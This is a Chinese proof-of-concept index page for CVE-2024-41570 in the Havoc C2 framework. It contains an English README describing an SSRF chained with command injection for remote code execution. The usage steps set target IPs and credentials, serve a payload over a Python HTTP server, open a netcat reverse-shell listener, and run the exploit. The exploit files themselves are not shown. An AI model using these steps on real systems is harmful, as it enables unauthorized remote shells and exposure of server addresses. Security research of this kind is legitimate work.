关联漏洞
标题:
Havoc 安全漏洞
(CVE-2024-41570)
描述:Havoc是Havoc Framework开源的一个现代且可扩展的开发后命令和控制框架。 Havoc 2 0.7版本存在安全漏洞,该漏洞源于demon回调处理中存在未经身份验证的服务端请求伪造漏洞,允许攻击者发送来自团队服务器的任意网络流量。
描述
This is a Chained RCE in the Havoc C2 framework using github.com/chebuya and github.com/IncludeSecurity pocs
介绍
# Havoc-C2-RCE (CVE-2024-41570)
This is a Chained RCE (CVE-2024-41570) in the Havoc C2 framework.
Command injection: Havoc is vulnerable to command injection enabling an authenticated user to execute commands on the Teamserver. Affects versions 0.3 up to the latest release 0.6. Havoc's default profile contains hardcoded passwords, so a C2 operator careless enough to use the default profile on a public network can immediately be exploited.
SSRF: This vulnerability is exploited by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
Chain: Abusing SSRF to deliver an authenticated command injection payload.
# How to use
```
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
```
Credits to [@chebuya](https://github.com/chebuya/Havoc-C2-SSRF-poc) and [@Hyperreality](https://github.com/IncludeSecurity/c2-vulnerabilities/blob/main/havoc_auth_rce/havoc_rce.py)
文件快照
[4.0K] /data/pocs/1c6b477c65fbf2895dd56a18f195853198f7f152
├── [9.8K] exploit.py
├── [ 64] payload.sh
├── [1.4K] README.md
└── [ 43] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。